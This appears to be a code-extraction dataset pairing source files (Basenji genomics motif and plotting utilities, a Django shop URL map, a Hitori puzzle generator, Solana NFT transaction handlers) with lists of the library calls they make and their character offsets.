info_content(pwm, transpose=False, bg_gc=0.415): """ Compute PWM information content. In the original analysis, I used a bg_gc=0.5. For any future analysis, I ought to switch to the true hg19 value of 0.415. """ pseudoc = 1e-9 if transpose: pwm = np.transpose(pwm) bg_pwm = [1 - bg_gc, bg_gc, bg_gc, 1 - bg_gc] ic = 0 for i in range(pwm.shape[0]): for j in range(4): # ic += 0.5 + pwm[i][j]*np.log2(pseudoc+pwm[i][j]) ic += -bg_pwm[j] * np.log2( bg_pwm[j]) + pwm[i][j] * np.log2(pseudoc + pwm[i][j]) return ic def make_filter_pwm(filter_fasta): """ Make a PWM for this filter from its top hits """ nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3} pwm_counts = [] nsites = 4 # pseudocounts for line in open(filter_fasta): if line[0] != '>': seq = line.rstrip() nsites += 1 if len(pwm_counts) == 0: # initialize with the length for i in range(len(seq)): pwm_counts.append(np.array([1.0] * 4)) # count for i in range(len(seq)): try: pwm_counts[i][nts[seq[i]]] += 1 except KeyError: pwm_counts[i] += np.array([0.25] * 4) # normalize pwm_freqs = [] for i in range(len(pwm_counts)): pwm_freqs.append([pwm_counts[i][j] / float(nsites) for j in range(4)]) return np.array(pwm_freqs), nsites - 4 def meme_add(meme_out, f, filter_pwm, nsites, trim_filters=False): """ Print a filter to the growing MEME file Attrs: meme_out : open file f (int) : filter index # filter_pwm (array) : filter PWM array nsites (int) : number of filter sites """ if not trim_filters: ic_start = 0 ic_end = filter_pwm.shape[0] - 1 else: ic_t = 0.2 # trim PWM of uninformative prefix ic_start = 0 while ic_start < filter_pwm.shape[0] and info_content( filter_pwm[ic_start:ic_start + 1]) < ic_t: ic_start += 1 # trim PWM of uninformative suffix ic_end = filter_pwm.shape[0] - 1 while ic_end >= 0 and info_content(filter_pwm[ic_end:ic_end + 1]) < ic_t: ic_end -= 1 if ic_start < ic_end: print('MOTIF filter%d' % f, file=meme_out) print( 'letter-probability matrix: alength= 4 w= %d nsites= %d' % (ic_end - ic_start + 1, nsites), file=meme_out) for i in range(ic_start, ic_end + 1): print('%.4f %.4f %.4f %.4f' % tuple(filter_pwm[i]), file=meme_out) print('', file=meme_out) def meme_intro(meme_file, seqs): """ Open MEME motif format file and print intro Attrs: meme_file (str) : filename seqs [str] : list of strings for obtaining background freqs Returns: mem_out : open MEME file """ nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3} # count nt_counts = [1] * 4 for i in range(len(seqs)): for nt in seqs[i]: try: nt_counts[nts[nt]] += 1 except KeyError: pass # normalize nt_sum = float(sum(nt_counts)) nt_freqs = [nt_counts[i] / nt_sum for i in range(4)] # open file for writing meme_out = open(meme_file, 'w') # print intro material print('MEME version 4', file=meme_out) print('', file=meme_out) print('ALPHABET= ACGT', file=meme_out) print('', file=meme_out) print('Background letter frequencies:', file=meme_out) print('A %.4f C %.4f G %.4f T %.4f' % tuple(nt_freqs), file=meme_out) print('', file=meme_out) return meme_out def name_filters(num_filters, tomtom_file, meme_db_file): """ Name the filters using Tomtom matches. Attrs: num_filters (int) : total number of filters tomtom_file (str) : filename of Tomtom output table. meme_db_file (str) : filename of MEME db Returns: filter_names [str] : """ # name by number filter_names = ['f%d' % fi for fi in range(num_filters)] # name by protein if tomtom_file is not None and meme_db_file is not None: motif_protein = get_motif_proteins(meme_db_file) # hash motifs and q-value's by filter filter_motifs = {} tt_in = open(tomtom_file) tt_in.readline() for line in tt_in: a = line.split() fi = int(a[0][6:]) motif_id = a[1] qval = float(a[5]) filter_motifs.setdefault(fi, []).append((qval, motif_id)) tt_in.close() # assign filter's best match for fi in filter_motifs: top_motif = sorted(filter_motifs[fi])[0][1] filter_names[fi] += '_%s' % motif_protein[top_motif] return np.array(filter_names) ################################################################################ # plot_target_corr # # Plot a clustered heatmap of correlations between filter activations and # targets. # # Input # filter_outs: # filter_names: # target_names: # out_pdf: ################################################################################ def plot_target_corr(filter_outs, seq_targets, filter_names, target_names, out_pdf, seq_op='mean'): num_seqs = filter_outs.shape[0] num_targets = len(target_names) if seq_op == 'mean': filter_outs_seq = filter_outs.mean(axis=2) else: filter_outs_seq = filter_outs.max(axis=2) # std is sequence by filter. filter_seqs_std = filter_outs_seq.std(axis=0) filter_outs_seq = filter_outs_seq[:, filter_seqs_std > 0] filter_names_live = filter_names[filter_seqs_std > 0] filter_target_cors = np.zeros((len(filter_names_live), num_targets)) for fi in range(len(filter_names_live)): for ti in range(num_targets): cor, p = spearmanr(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti]) filter_target_cors[fi, ti] = cor cor_df = pd.DataFrame( filter_target_cors, index=filter_names_live, columns=target_names) sns.set(font_scale=0.3) plt.figure() sns.clustermap(cor_df, cmap='BrBG', center=0, figsize=(8, 10)) plt.savefig(out_pdf) plt.close() ################################################################################ # plot_filter_seq_heat # # Plot a clustered heatmap of filter activations in # # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def plot_filter_seq_heat(filter_outs, out_pdf, whiten=True, drop_dead=True): # compute filter output means per sequence filter_seqs = filter_outs.mean(axis=2) # whiten if whiten: filter_seqs = preprocessing.scale(filter_seqs) # transpose filter_seqs = np.transpose(filter_seqs) if drop_dead: filter_stds = filter_seqs.std(axis=1) filter_seqs = filter_seqs[filter_stds > 0] # downsample sequences seqs_i = np.random.randint(0, filter_seqs.shape[1], 500) hmin = np.percentile(filter_seqs[:, seqs_i], 0.1) hmax = np.percentile(filter_seqs[:, seqs_i], 99.9) sns.set(font_scale=0.3) plt.figure() sns.clustermap( filter_seqs[:, seqs_i], row_cluster=True, col_cluster=True, linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax) plt.savefig(out_pdf) #out_png = out_pdf[:-2] + 'ng' #plt.savefig(out_png, dpi=300) plt.close() ################################################################################ # plot_filter_seq_heat # # Plot a clustered heatmap of filter activations in sequence segments. # # Mean doesn't work well for the smaller segments for some reason, but taking # the max looks OK. Still, similar motifs don't cluster quite as well as you # might expect. # # Input # filter_outs ################################################################################ def plot_filter_seg_heat(filter_outs, out_pdf, whiten=True, drop_dead=True): b = filter_outs.shape[0] f = filter_outs.shape[1] l = filter_outs.shape[2] s = 5 while l / float(s) - (l / s) > 0: s += 1 print('%d segments of length %d' % (s, l / s)) # split into multiple segments filter_outs_seg = np.reshape(filter_outs, (b, f, s, l / s)) # mean across the segments filter_outs_mean = filter_outs_seg.max(axis=3) # break each segment into a new instance filter_seqs = np.reshape(np.swapaxes(filter_outs_mean, 2, 1), (s * b, f)) # whiten if whiten: filter_seqs = preprocessing.scale(filter_seqs) # transpose filter_seqs = np.transpose(filter_seqs) if drop_dead: filter_stds = filter_seqs.std(axis=1) filter_seqs = filter_seqs[filter_stds > 0] # downsample sequences seqs_i = np.random.randint(0, filter_seqs.shape[1], 500) hmin = np.percentile(filter_seqs[:, seqs_i], 0.1) hmax = np.percentile(filter_seqs[:, seqs_i], 99.9) sns.set(font_scale=0.3) if whiten: dist = 'euclidean' else: dist = 'cosine' plt.figure() sns.clustermap( filter_seqs[:, seqs_i], metric=dist, row_cluster=True, col_cluster=True, linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax) plt.savefig(out_pdf) #out_png = out_pdf[:-2] + 'ng' #plt.savefig(out_png, dpi=300) plt.close() ################################################################################ # filter_motif # # Collapse the filter parameter matrix to a single DNA motif. # # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def filter_motif(param_matrix): nts = 'ACGT' motif_list = [] for v in range(param_matrix.shape[1]): max_n = 0 for n in range(1, 4): if param_matrix[n, v] > param_matrix[max_n, v]: max_n = n if param_matrix[max_n, v] > 0: motif_list.append(nts[max_n]) else: motif_list.append('N') return ''.join(motif_list) ################################################################################ # filter_possum # # Write a Possum-style motif # # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def filter_possum(param_matrix, motif_id, possum_file, trim_filters=False, mult=200): # possible trim trim_start = 0 trim_end = param_matrix.shape[1] - 1 trim_t = 0.3 if trim_filters: # trim PWM of uninformative prefix while trim_start < param_matrix.shape[1] and np.max( param_matrix[:, trim_start]) - np.min( param_matrix[:, trim_start]) < trim_t: trim_start += 1 # trim PWM of uninformative suffix while trim_end >= 0 and np.max(param_matrix[:, trim_end]) - np.min( param_matrix[:, trim_end]) < trim_t: trim_end -= 1 if trim_start < trim_end: possum_out = open(possum_file, 'w') print('BEGIN GROUP', file=possum_out) print('BEGIN FLOAT', file=possum_out) print('ID %s' % motif_id, file=possum_out) print('AP DNA', file=possum_out) print('LE %d' % (trim_end + 1 - trim_start), file=possum_out) for ci in range(trim_start, trim_end + 1): print( 'MA %s' % ' '.join(['%.2f' % (mult * n) for n in param_matrix[:, ci]]), file=possum_out) print('END', file=possum_out) print('END', file=possum_out) possum_out.close() ################################################################################ # plot_filter_heat # # Plot a heatmap of the filter's parameters. # # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def plot_filter_heat(param_matrix, out_pdf): param_range = abs(param_matrix).max() sns.set(font_scale=2) plt.figure(figsize=(param_matrix.shape[1], 4)) sns.heatmap( param_matrix, cmap='PRGn', linewidths=0.2, vmin=-param_range, vmax=param_range) ax = plt.gca() ax.set_xticklabels(range(1, param_matrix.shape[1] + 1)) ax.set_yticklabels('TGCA', rotation='horizontal') # , size=10) plt.savefig(out_pdf) plt.close() ################################################################################ # plot_filter_logo # # Plot a weblogo of the filter's occurrences # # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def plot_filter_logo(filter_outs, filter_size, seqs, out_prefix, raw_t=0, maxpct_t=None): if maxpct_t: all_outs = np.ravel(filter_outs) all_outs_mean = all_outs.mean() all_outs_norm = all_outs - all_outs_mean raw_t = maxpct_t * all_outs_norm.max() + all_outs_mean left_pad = (filter_size - 1) // 2 right_pad = filter_size - left_pad # print fasta file of positive outputs filter_fasta_out = open('%s.fa' % out_prefix, 'w') filter_count = 0 for i in range(filter_outs.shape[0]): for j in range(filter_outs.shape[1]): if filter_outs[i, j] > raw_t: # construct kmer kmer = '' # determine boundaries, considering padding fstart = j - left_pad fend = fstart + filter_size # if it starts in left_pad if fstart < 0: kmer += 'N' * (-fstart) fstart = 0 # add primary sequence kmer += seqs[i][fstart:fend] # if it ends in right_pad if fend > len(seqs[i]): kmer += 'N' * (fend - len(seqs[i])) # output print('>%d_%d' % (i, j), file=filter_fasta_out) print(kmer, file=filter_fasta_out) filter_count += 1 filter_fasta_out.close() # make weblogo if filter_count > 0: weblogo_cmd = 'weblogo %s < %s.fa > %s.eps' % (weblogo_opts, out_prefix, out_prefix) subprocess.call(weblogo_cmd, shell=True) ################################################################################ # plot_score_density # # Plot the score density and print to the stats table. # # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def plot_score_density(f_scores, out_pdf): sns.set(font_scale=1.3) plt.figure() sns.distplot(f_scores, kde=False) plt.xlabel('ReLU output') plt.savefig(out_pdf) plt.close() return f_scores.mean(), f_scores.std() ################################################################################ # __main__ ################################################################################ if __name__ == '__main__': main() # pdb.runcall(main)
[ "basenji.seqnn.SeqNN", "numpy.array", "basenji.dna_io.read_job_params", "basenji.batcher.BatcherF", "seaborn.set", "numpy.reshape", "seaborn.distplot", "matplotlib.pyplot.xlabel", "basenji.batcher.Batcher", "tensorflow.Session", "numpy.max", "matplotlib.pyplot.close", "os.path.isdir", "basenji.dna_io.hot1_dna", "subprocess.call", "os.mkdir", "numpy.min", "pandas.DataFrame", "scipy.stats.spearmanr", "matplotlib.pyplot.savefig", "matplotlib.use", "seaborn.clustermap", "matplotlib.pyplot.gca", "seaborn.heatmap", "h5py.File", "numpy.squeeze", "numpy.log2", "numpy.transpose", "time.time", "sklearn.preprocessing.scale", "tensorflow.train.Saver", "optparse.OptionParser", "numpy.swapaxes", "matplotlib.pyplot.figure", "numpy.random.randint", "numpy.ravel", "numpy.percentile" ]
[((829, 850), 'matplotlib.use', 'matplotlib.use', (['"""PDF"""'], {}), "('PDF')\n", (843, 850), False, 'import matplotlib\n'), ((1670, 1689), 'optparse.OptionParser', 'OptionParser', (['usage'], {}), '(usage)\n', (1682, 1689), False, 'from optparse import OptionParser\n'), ((3270, 3290), 'h5py.File', 'h5py.File', (['data_file'], {}), '(data_file)\n', (3279, 3290), False, 'import h5py\n'), ((3793, 3828), 'basenji.dna_io.hot1_dna', 'basenji.dna_io.hot1_dna', (['test_seqs1'], {}), '(test_seqs1)\n', (3816, 3828), False, 'import basenji\n'), ((3945, 3988), 'basenji.dna_io.read_job_params', 'basenji.dna_io.read_job_params', (['params_file'], {}), '(params_file)\n', (3975, 3988), False, 'import basenji\n'), ((4195, 4206), 'time.time', 'time.time', ([], {}), '()\n', (4204, 4206), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((4214, 4235), 'basenji.seqnn.SeqNN', 'basenji.seqnn.SeqNN', ([], {}), '()\n', (4233, 4235), False, 'import basenji\n'), ((5041, 5057), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (5055, 5057), True, 'import tensorflow as tf\n'), ((7204, 7367), 'subprocess.call', 'subprocess.call', (["('tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\n (options.out_dir, options.out_dir, options.meme_db))"], {'shell': '(True)'}), "(\n 'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\n (options.out_dir, options.out_dir, options.meme_db), shell=True)\n", (7219, 7367), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((14271, 14293), 'numpy.array', 'np.array', (['filter_names'], {}), '(filter_names)\n', (14279, 14293), True, 'import numpy as np\n'), ((15402, 15481), 'pandas.DataFrame', 'pd.DataFrame', (['filter_target_cors'], {'index': 'filter_names_live', 'columns': 'target_names'}), '(filter_target_cors, index=filter_names_live, columns=target_names)\n', (15414, 15481), True, 'import pandas as pd\n'), ((15492, 15515), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (15499, 15515), True, 'import seaborn as sns\n'), ((15518, 15530), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (15528, 15530), True, 'import matplotlib.pyplot as plt\n'), ((15533, 15595), 'seaborn.clustermap', 'sns.clustermap', (['cor_df'], {'cmap': '"""BrBG"""', 'center': '(0)', 'figsize': '(8, 10)'}), "(cor_df, cmap='BrBG', center=0, figsize=(8, 10))\n", (15547, 15595), True, 'import seaborn as sns\n'), ((15598, 15618), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (15609, 15618), True, 'import matplotlib.pyplot as plt\n'), ((15621, 15632), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (15630, 15632), True, 'import matplotlib.pyplot as plt\n'), ((16225, 16250), 'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\n', (16237, 16250), True, 'import numpy as np\n'), ((16394, 16441), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\n', (16411, 16441), True, 'import numpy as np\n'), ((16452, 16494), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\n', (16465, 16494), True, 'import numpy as np\n'), ((16504, 16547), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\n', (16517, 16547), True, 'import numpy as np\n'), ((16551, 16574), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (16558, 16574), True, 'import seaborn as sns\n'), ((16578, 16590), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (16588, 16590), True, 'import matplotlib.pyplot as plt\n'), ((16593, 16726), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], row_cluster=True, col_cluster=True,\n linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\n', (16607, 16726), True, 'import seaborn as sns\n'), ((16768, 16788), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (16779, 16788), True, 'import matplotlib.pyplot as plt\n'), ((16857, 16868), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (16866, 16868), True, 'import matplotlib.pyplot as plt\n'), ((17644, 17685), 'numpy.reshape', 'np.reshape', (['filter_outs', '(b, f, s, l / s)'], {}), '(filter_outs, (b, f, s, l / s))\n', (17654, 17685), True, 'import numpy as np\n'), ((17992, 18017), 'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\n', (18004, 18017), True, 'import numpy as np\n'), ((18161, 18208), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\n', (18178, 18208), True, 'import numpy as np\n'), ((18219, 18261), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\n', (18232, 18261), True, 'import numpy as np\n'), ((18271, 18314), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\n', (18284, 18314), True, 'import numpy as np\n'), ((18318, 18341), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (18325, 18341), True, 'import seaborn as sns\n'), ((18409, 18421), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (18419, 18421), True, 'import matplotlib.pyplot as plt\n'), ((18424, 18570), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'metric': 'dist', 'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], metric=dist, row_cluster=True,\n col_cluster=True, linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\n', (18438, 18570), True, 'import seaborn as sns\n'), ((18618, 18638), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (18629, 18638), True, 'import matplotlib.pyplot as plt\n'), ((18707, 18718), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (18716, 18718), True, 'import matplotlib.pyplot as plt\n'), ((21275, 21296), 'seaborn.set', 'sns.set', ([], {'font_scale': '(2)'}), '(font_scale=2)\n', (21282, 21296), True, 'import seaborn as sns\n'), ((21299, 21345), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(param_matrix.shape[1], 4)'}), '(figsize=(param_matrix.shape[1], 4))\n', (21309, 21345), True, 'import matplotlib.pyplot as plt\n'), ((21348, 21443), 'seaborn.heatmap', 'sns.heatmap', (['param_matrix'], {'cmap': '"""PRGn"""', 'linewidths': '(0.2)', 'vmin': '(-param_range)', 'vmax': 'param_range'}), "(param_matrix, cmap='PRGn', linewidths=0.2, vmin=-param_range,\n vmax=param_range)\n", (21359, 21443), True, 'import seaborn as sns\n'), ((21478, 21487), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (21485, 21487), True, 'import matplotlib.pyplot as plt\n'), ((21614, 21634), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (21625, 21634), True, 'import matplotlib.pyplot as plt\n'), ((21637, 21648), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (21646, 21648), True, 'import matplotlib.pyplot as plt\n'), ((23772, 23795), 'seaborn.set', 'sns.set', ([], {'font_scale': '(1.3)'}), '(font_scale=1.3)\n', (23779, 23795), True, 'import seaborn as sns\n'), ((23798, 23810), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (23808, 23810), True, 'import matplotlib.pyplot as plt\n'), ((23813, 23846), 'seaborn.distplot', 'sns.distplot', (['f_scores'], {'kde': '(False)'}), '(f_scores, kde=False)\n', (23825, 23846), True, 'import seaborn as sns\n'), ((23849, 23874), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""ReLU output"""'], {}), "('ReLU output')\n", (23859, 23874), True, 'import matplotlib.pyplot as plt\n'), ((23877, 23897), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (23888, 23897), True, 'import matplotlib.pyplot as plt\n'), ((23900, 23911), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (23909, 23911), True, 'import matplotlib.pyplot as plt\n'), ((3110, 3140), 'os.path.isdir', 'os.path.isdir', (['options.out_dir'], {}), '(options.out_dir)\n', (3123, 3140), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((3146, 3171), 'os.mkdir', 'os.mkdir', (['options.out_dir'], {}), '(options.out_dir)\n', (3154, 3171), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((4674, 4804), 'basenji.batcher.BatcherF', 'basenji.batcher.BatcherF', (['test_seqs1', 'test_targets', 'test_targets_imag'], {'batch_size': 'dr.batch_size', 'pool_width': "job['target_pool']"}), "(test_seqs1, test_targets, test_targets_imag,\n batch_size=dr.batch_size, pool_width=job['target_pool'])\n", (4698, 4804), False, 'import basenji\n'), ((4869, 4979), 'basenji.batcher.Batcher', 'basenji.batcher.Batcher', (['test_seqs1', 'test_targets'], {'batch_size': 'dr.batch_size', 'pool_width': "job['target_pool']"}), "(test_seqs1, test_targets, batch_size=dr.batch_size,\n pool_width=job['target_pool'])\n", (4892, 4979), False, 'import basenji\n'), ((5066, 5078), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (5076, 5078), True, 'import tensorflow as tf\n'), ((5355, 5366), 'time.time', 'time.time', ([], {}), '()\n', (5364, 5366), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((10067, 10084), 'numpy.transpose', 'np.transpose', (['pwm'], {}), '(pwm)\n', (10079, 10084), True, 'import numpy as np\n'), ((11127, 11146), 'numpy.array', 'np.array', (['pwm_freqs'], {}), '(pwm_freqs)\n', (11135, 11146), True, 'import numpy as np\n'), ((16161, 16193), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\n', (16180, 16193), False, 'from sklearn import preprocessing\n'), ((17836, 17871), 'numpy.swapaxes', 'np.swapaxes', (['filter_outs_mean', '(2)', '(1)'], {}), '(filter_outs_mean, 2, 1)\n', (17847, 17871), True, 'import numpy as np\n'), ((17928, 17960), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\n', (17947, 17960), False, 'from sklearn import preprocessing\n'), ((22080, 22101), 'numpy.ravel', 'np.ravel', (['filter_outs'], {}), '(filter_outs)\n', (22088, 22101), True, 'import numpy as np\n'), ((23363, 23403), 'subprocess.call', 'subprocess.call', (['weblogo_cmd'], {'shell': '(True)'}), '(weblogo_cmd, shell=True)\n', (23378, 23403), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((5263, 5289), 'numpy.squeeze', 'np.squeeze', (['filter_weights'], {}), '(filter_weights)\n', (5273, 5289), True, 'import numpy as np\n'), ((8287, 8317), 'numpy.ravel', 'np.ravel', (['filter_outs[:, :, f]'], {}), '(filter_outs[:, :, f])\n', (8295, 8317), True, 'import numpy as np\n'), ((15289, 15350), 'scipy.stats.spearmanr', 'spearmanr', (['filter_outs_seq[:, fi]', 'seq_targets[:num_seqs, ti]'], {}), '(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti])\n', (15298, 15350), False, 'from scipy.stats import spearmanr\n'), ((4289, 4300), 'time.time', 'time.time', ([], {}), '()\n', (4298, 4300), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((10281, 10299), 'numpy.log2', 'np.log2', (['bg_pwm[j]'], {}), '(bg_pwm[j])\n', (10288, 10299), True, 'import numpy as np\n'), ((10325, 10353), 'numpy.log2', 'np.log2', (['(pseudoc + pwm[i][j])'], {}), '(pseudoc + pwm[i][j])\n', (10332, 10353), True, 'import numpy as np\n'), ((19977, 20012), 'numpy.max', 'np.max', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\n', (19983, 20012), True, 'import numpy as np\n'), ((20024, 20059), 'numpy.min', 'np.min', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\n', (20030, 20059), True, 'import numpy as np\n'), ((20173, 20206), 'numpy.max', 'np.max', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, trim_end])\n', (20179, 20206), True, 'import numpy as np\n'), ((20209, 20242), 'numpy.min', 'np.min', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, trim_end])\n', (20215, 20242), True, 'import numpy as np\n'), ((10779, 10798), 'numpy.array', 'np.array', (['([1.0] * 4)'], {}), '([1.0] * 4)\n', (10787, 10798), True, 'import numpy as np\n'), ((10954, 10974), 'numpy.array', 'np.array', (['([0.25] * 4)'], {}), '([0.25] * 4)\n', (10962, 10974), True, 'import numpy as np\n')]
from django.urls import path from . import views app_name = "shop" urlpatterns = [ path('', views.HomePage.as_view(), name="home-page"), path('shop/', views.ProductListView.as_view(), name="product-list"), path('shop/<int:category_pk>/', views.ProductListView.as_view(), name="product-list"), path('shop/products/<int:pk>/', views.ProductDetailView.as_view(), name="product-detail"), path('cart/', views.cart_view, name="cart"), path('cart/add/<int:product_pk>/', views.add_product_to_order, name="add-product-to-cart"), path('cart/add/<int:product_pk>/json/', views.add_product_to_cart_json, name="add-product-to-cart-json"), path('checkout/', views.CheckOut.as_view(), name="checkout"), path('checkout/<int:address_pk>/', views.CheckOut.as_view(), name="checkout"), path('payment/', views.PaymentChoice.as_view(), name="payment-choice"), path('payment/order/<int:pk>/', views.MomoPayment.as_view(), name="momo-payment"), path('payment/momo/<int:pk>/confirm/', views.ConfirmMomoPayment.as_view(), name="confirm-momo-payment"), path('orders/', views.OrderList.as_view(), name="order-list"), path('orders/<int:pk>/', views.OrderDetail.as_view(), name="order-detail"), path('orders/<int:order_id>/items/<int:pk>/', views.OrderItemDetail.as_view(), name="order-item-detail"), ]
[ "django.urls.path" ]
[((406, 449), 'django.urls.path', 'path', (['"""cart/"""', 'views.cart_view'], {'name': '"""cart"""'}), "('cart/', views.cart_view, name='cart')\n", (410, 449), False, 'from django.urls import path\n'), ((455, 550), 'django.urls.path', 'path', (['"""cart/add/<int:product_pk>/"""', 'views.add_product_to_order'], {'name': '"""add-product-to-cart"""'}), "('cart/add/<int:product_pk>/', views.add_product_to_order, name=\n 'add-product-to-cart')\n", (459, 550), False, 'from django.urls import path\n'), ((551, 659), 'django.urls.path', 'path', (['"""cart/add/<int:product_pk>/json/"""', 'views.add_product_to_cart_json'], {'name': '"""add-product-to-cart-json"""'}), "('cart/add/<int:product_pk>/json/', views.add_product_to_cart_json,\n name='add-product-to-cart-json')\n", (555, 659), False, 'from django.urls import path\n')]
from hitori_generator import Generator from argparse import ArgumentParser def generate(n: int, output_file: str) -> None: if n < 3 or n > 8: print("It isn't valid size") exit(4) generator = Generator(n) data = generator.generate() lines = map(lambda x: ' '.join(map(str, x)), data) with open(output_file, 'w', encoding='utf-8') as f: f.write('\n'.join(lines)) def main(): p = ArgumentParser() p.add_argument('filename', type=str, help='Path to output file') p.add_argument('-s', "--size", type=int, default=3, help='Generate SxS field. size must be in [3, 8]. Default is 3') args = p.parse_args() generate(args.size, args.filename) if __name__ == '__main__': main()
[ "hitori_generator.Generator", "argparse.ArgumentParser" ]
[((217, 229), 'hitori_generator.Generator', 'Generator', (['n'], {}), '(n)\n', (226, 229), False, 'from hitori_generator import Generator\n'), ((429, 445), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (443, 445), False, 'from argparse import ArgumentParser\n')]
from common.make_tx import make_swap_tx from sol.handle_simple import handle_unknown_detect_transfers def handle_metaplex(exporter, txinfo): transfers_in, transfers_out, _ = txinfo.transfers_net if len(transfers_in) == 1 and len(transfers_out) == 1: sent_amount, sent_currency, _, _ = transfers_out[0] received_amount, received_currency, _, _ = transfers_in[0] row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency) exporter.ingest_row(row) else: handle_unknown_detect_transfers(exporter, txinfo) def is_nft_mint(txinfo): log_instructions = txinfo.log_instructions transfers_in, transfers_out, _ = txinfo.transfers_net if "MintTo" in log_instructions and len(transfers_out) == 1 and len(transfers_in) == 0: return True elif ("MintTo" in log_instructions and len(transfers_out) == 1 and len(transfers_in) == 1 and transfers_in[0][0] == 1): return True else: return False def handle_nft_mint(exporter, txinfo): transfers_in, transfers_out, transfers_unknown = txinfo.transfers_net if len(transfers_in) == 1 and len(transfers_out) == 1: sent_amount, sent_currency, _, _ = transfers_out[0] received_amount, received_currency, _, _ = transfers_in[0] row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency) exporter.ingest_row(row) return handle_unknown_detect_transfers(exporter, txinfo)
[ "common.make_tx.make_swap_tx", "sol.handle_simple.handle_unknown_detect_transfers" ]
